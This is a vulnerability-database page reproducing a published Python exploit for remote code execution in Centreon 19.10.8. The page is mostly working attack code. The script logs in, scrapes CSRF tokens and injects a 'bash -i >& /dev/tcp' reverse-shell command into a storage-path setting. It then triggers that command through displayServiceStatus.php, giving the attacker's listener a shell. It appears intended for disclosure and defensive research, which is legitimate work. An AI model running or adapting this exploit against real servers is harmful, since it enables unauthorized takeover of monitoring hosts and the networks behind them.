Lucene search
K

Centreo 19.10.8 Remote Code Execution

🗓️ 26 Mar 2020 00:00:00Reported by Engin DemirbilekType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 166 Views

Centreo 19.10.8 Remote Code Execution exploit allows attackers to execute arbitrary code via 'DisplayServiceStatus' function, potentially leading to system compromise

Code
`# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution  
# Date: 2020-03-25  
# Exploit Author: Engin Demirbilek  
# Vendor Homepage: https://www.centreon.com/  
# Version: 19.10.8  
# Tested on: CentOS  
# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce  
# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607   
  
#!/usr/bin/python  
  
import requests  
import sys  
import warnings  
from bs4 import BeautifulSoup  
  
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')  
  
if len(sys.argv) < 6:  
print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"  
exit()  
  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
ip = sys.argv[4]  
port = sys.argv[5]  
  
  
req = requests.session()  
print("[+] Retrieving CSRF token...")  
loginPage = req.get(url+"/index.php")  
response = loginPage.text  
s = BeautifulSoup(response, 'html.parser')  
centreon_token = s.find('input', {'name':'centreon_token'})['value']  
  
login_creds = {  
"useralias": username,  
"password": password,  
"submitLogin": "Connect",  
"centreon_token": centreon_token  
}  
  
  
print("[+] Sendin login request...")  
login = req.post(url+"/index.php", login_creds)  
  
if "incorrect" not in login.text:  
print("[+] Logged In, retrieving second token")  
  
page = url + "/main.get.php?p=50118"  
second_token_req = req.get(page)  
response = second_token_req.text  
s = BeautifulSoup(response, 'html.parser')  
second_token = s.find('input', {'name':'centreon_token'})['value']  
  
payload = {  
"RRDdatabase_path": "/var/lib/centreon/metrics/",  
"RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),  
"RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",  
"reporting_retention": "365",  
"archive_retention": "31",  
"len_storage_mysql": "365",  
"len_storage_rrd": "180",  
"len_storage_downtimes": "0",  
"len_storage_comments": "0",  
"partitioning_retention": "365",  
"partitioning_retention_forward": "10",  
"cpartitioning_backup_directory": "/var/cache/centreon/backup",  
"audit_log_option": "1",  
"audit_log_retention": "0",  
"submitC": "Save",  
"gopt_id": "",  
"o": "storage",  
"o": "storage",  
"centreon_token": second_token,  
  
  
}  
print("[+] Sendin payload...")  
send_payload = req.post(page, payload)  
  
trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"  
print("[+] Triggerring payload...")  
trigger = req.get(trigger_url)  
  
print("[+] Check your listener !...")  
  
else:  
print("[-] Wrong credentials")  
exit()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation